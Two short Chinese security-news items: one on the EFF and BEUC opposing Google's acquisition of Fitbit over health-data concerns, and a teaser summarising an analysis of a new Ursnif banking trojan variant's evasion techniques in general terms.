5月14日，欧洲消费者组织BEUC警告称谷歌收购Fitbit会改变数字健康市场的游戏规则，可能会损害消费者利益，同时阻碍创新。在近日电子前沿基金会（EFF）发布的公开信中，该机构也持相同的观点，希望能够阻止谷歌收购Fitbit，并希望得到之前已购买Fitbit产品用户的支持。 更具体来说，EFF认为只有Fitbit的用户才能帮助阻止这次收购，并向Fitbit用户发出了灵魂拷问。EFF问道：“你购买Fitbit产品的原因之一是不是不愿意向谷歌分享更多的数据？谷歌收购Fitbit是否让你有种无法逃脱谷歌数据收集魔爪的感觉？” EFF表示科技巨头并不一定会投资创新，而是更喜欢收购能够为创新加油的公司。EFF表示：“谷歌的两个标志性项目搜索和Gmail都是内部项目，但其他绝大多数产品的成功都是收购自其他公司。” EFF继续说道：“现在谷歌正尝试在Fitbit旧戏重演，这会让这家占主导地位的可穿戴健身追踪公司消失进入Googleplex中，而其中会收集大量用户的敏感数据。” 谷歌于去年11月官宣了这笔交易，通过收购Fitbit，谷歌试图在竞争激烈的健身追踪器和智能手表市场上与苹果和三星一较高下。在这一领域，华为和小米也是主要竞争者。 然而，批评人士表示，收购Fitbit将使这家美国科技巨头获得大量的健康数据。这些数据来自于Fitbit的健身追踪器和其他用于监控用户日常步数、卡路里消耗和行驶距离的设备。   （稿源：cnBeta，封面源自网络。）

工具泄露是网络安全中非常有趣的事件。一方面泄露的工具在被熟知且进行分析后，会对原有的文件造成某种意义的破坏，另一方面其内容将会被传入到较低版本的工具当中。本文将会对Ursnif的新版本进行了详细分析。 由于恶意软件的存在，源代码泄露情况很普遍。2017年，代码“ Eternal Blue”（CVE-2017-0144）遭泄露并被黑客入侵，而早在2010年银行木马Zeus的泄露就已经形成了恶意软件新格局，该木马的源代码在泄露后，出现了与该银行木马相同的代码库。本文我将重点介绍源代码在2014年就被泄露的系列事件，这个系列被称为Ursnif（也称为Gozi2 / ISFB），Ursnif是成熟的银行木马，而关于该系列的研究也有很多。 本文中我对Ursnif的最新变体进行了分析，发现它利用LOLBins、组件对象模型（COM）接口等技术来检测Internet Explorer，借此绕过本地代理以及Windows Management Instrumentation（WMI）来与操作系统进行交互，达到代替本地Win32 API的效果，该操作很难被检测到。 …… 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1213/   消息来源：telekom， 译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接